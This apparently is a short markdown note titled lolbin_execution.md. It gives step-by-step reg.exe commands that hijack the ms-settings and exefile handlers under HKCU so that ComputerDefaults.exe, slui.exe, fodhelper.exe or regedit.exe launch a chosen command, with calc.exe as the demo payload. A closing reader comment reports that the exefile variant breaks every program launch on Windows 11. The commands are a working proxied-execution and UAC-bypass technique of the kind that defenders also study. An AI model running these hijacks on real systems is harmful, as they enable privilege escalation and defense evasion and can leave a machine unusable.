Proxied Execution techniques utilizing registry hijacks.

lolbin_execution.md

Proxied Execution using ComputerDefaults.exe using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe

Step 3: Cleanup the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f

Proxied Execution using slui.exe, fodhelper.exe, regedit.exe using exefile Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\slui.exe

C:\Windows\System32\fodhelper.exe

C:\Windows\System32\regedit.exe

Step 3: Cleanup the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\exefile /f

What version(s) did you test on? I'm getting weird results with the second method on win11 and server 25. Terminal gives an error but it seems like every other exe is being replaced with cmd.exe /c notepad, so I guess it worked but I'm not sure what the results mean.